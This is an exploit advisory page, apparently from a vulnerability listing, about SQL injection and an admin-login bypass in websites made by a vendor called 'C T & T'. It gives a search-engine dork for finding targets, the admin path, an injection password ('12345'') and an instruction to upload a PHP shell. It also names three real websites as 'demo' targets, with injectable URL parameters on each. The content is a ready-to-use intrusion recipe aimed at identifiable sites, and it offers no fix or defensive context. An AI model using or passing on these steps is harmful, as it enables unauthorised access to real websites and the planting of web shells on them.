C T & T SQL Injection Vulnerability And Bypass Admin page Login

2019.03.25

Mr Hashtag (IR)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

Dork: "Design & Developed By C T & T"

#######################
# Exploit Title : C T & T SQL Injection Vulnerability And Bypass Admin page Login
# Exploit Author : MR (#)
# Vendor Homepage : Not Found
# Google Dork : "Design & Developed By C T & T"
# Tested On: Windows
# Exploit Risk : Medium
#######################
# 1_search google dork: "Design & Developed By C T & T"
# 2_admin page: /admin
# 3_username: admin
# password: 12345'
# 4_upload shell .php
#
# demo:
# http://prjbathfitting.com/admin/
# http://www.harjeetmachineries.com/admin/
# http://spindustries.online/admin/
#######################
# SQL Injection Vulnerability
# demo:
# http://prjbathfitting.com/our-products.php?fname=Nipple
# http://harjeetmachineries.com/our-products.php?fname=Juicers
# http://spindustries.online/our-products.php?fname=Acessocies
#
#######################
# me:
# instagram.com/mr_h4shtag
#######################
# thank to:
# instagram.com/mr_b3hz4d
#######################

See this note in RAW Version

Vote for this issue:

100%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

C T & T SQL Injection Vulnerability And Bypass Admin page Login

Dork: "Design & Developed By C T & T"

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.